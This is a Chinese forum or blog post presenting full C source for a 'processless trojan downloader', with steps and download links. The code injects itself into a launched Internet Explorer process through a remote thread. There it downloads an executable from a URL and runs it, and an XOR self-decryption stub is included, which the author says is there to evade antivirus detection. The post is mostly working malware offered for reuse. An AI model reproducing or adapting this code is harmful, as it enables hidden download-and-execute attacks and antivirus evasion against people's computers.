VC无进程木马下载器源码
一、 打开半年前的一个工程,是利用IE来隐藏进程下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码 ,举例下载迅雷而矣:
- /*
- VC无进程木马下载器
- By: Kardinal and 寂寞的狼
- 2009.3.10
- */
- #include <windows.h>
- #pragma comment(lib,"user32.lib")
- #pragma comment(lib,"kernel32.lib")
- //取消这4行的注释,可编译出2K大的文件
- //#pragma comment(linker,"/OPT:NOWIN98")
- //#pragma comment(linker,"/merge:.data=.text")
- //#pragma comment(linker,"/merge:.rdata=.text")
- //#pragma comment(linker,"/align:0x200")
- #pragma comment(linker,"/ENTRY:decrpt")
- #pragma comment(linker,"/subsystem:windows")
- #pragma comment(linker,"/BASE:0x13150000")
- //动态加载shell32.dll中的ShellExecuteA函数
- HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
- //动态加载Urlmon.dll中的UrlDownloadToFileA函数
- DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
- //建立远程线程,并运行
- HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
- void decrpt();
- HANDLE processhandle;
- DWORD pid;
- HINSTANCE hshell,hurlmon,hkernel;// HINSTANCE与HMOUDLE是通用
- // 注入使用的下载函数
- void download()
- {
- hshell = LoadLibrary("Shell32.dll");
- hurlmon = LoadLibrary("urlmon.dll");
- (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
- (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
- //下载的文件自行调整
- DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
- SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
- ExitProcess(0);
- }
- void main()
- {
- char iename[MAX_PATH],iepath[MAX_PATH];
- ZeroMemory(iename,sizeof(iename));
- ZeroMemory(iepath,sizeof(iepath));
- // 1.获取程序自身路径,启动IE进程
- GetWindowsDirectory(iepath,MAX_PATH);
- strncpy(iename,iepath,3);
- strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
- WinExec(iename,SW_SHOWNORMAL);
- Sleep(500);
- // 2.得到IE进程句柄
- HWND htemp;
- htemp = FindWindow("IEFrame",NULL);
- GetWindowThreadProcessId(htemp,&pid);
- // 3.分配内存
- HMODULE Module;
- LPVOID NewModule;
- DWORD Size;
- LPDWORD lpimagesize;
- // 4.进程映像的地址
- Module = GetModuleHandle(NULL);
- // 5.得到内存镜像大小
- _asm
- {
- push eax;
- push ebx;
- mov ebx,Module;
- mov eax,[ebx+0x3c];
- lea eax,[ebx+eax+0x50];
- mov eax,[eax]
- mov lpimagesize,eax;
- pop ebx;
- pop eax;
- };
- Size=(DWORD)lpimagesize;
- // 确定起始基址和内存映像基址的位置
- NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- // 6.写内存,创建线程,写数据
- WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
- LPTHREAD_START_ROUTINE entrypoint;
- __asm
- {
- push eax;
- lea eax,download;
- mov entrypoint,eax;
- pop eax
- }
- hkernel=LoadLibrary("KERNEL32.dll");
- (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
- MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL); //建立远程线程,并运行
- // 7.关闭对象
- CloseHandle(processhandle);
- return;
- } ;
- // 解密函数
- void decrpt()
- {
- HANDLE myps;
- DWORD oldAttr;
- BYTE shellcode[500];
- ZeroMemory(shellcode,sizeof(shellcode));
- myps=GetCurrentProcess();
- ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
- //先把原代码,搬移到变量中保存起来
- _asm
- {
- pushad;
- lea esi,download;
- lea edi,shellcode;
- lea ecx,decrpt;
- sub ecx,esi;
- en1:
- lodsb;
- stosb;
- dec ecx;
- jne en1;
- popad;
- };
- //解密搬回
- int i;
- for (i=1;i<=0xFF;i++)
- {
- _asm
- {
- pushad;
- lea esi,shellcode;
- lea edi,download;
- lea ecx,decrpt;
- sub ecx,edi;
- en2:
- lodsb;
- mov ebx,i;
- xor al,bl;
- stosb;
- dec ecx;
- jne en2;
- popad;
- };
- //此结构的的作用在于使一般的杀毒软件无法探测出来是病毒.
- __try
- {
- main();
- return;
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- };
- }
- return;
- }
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/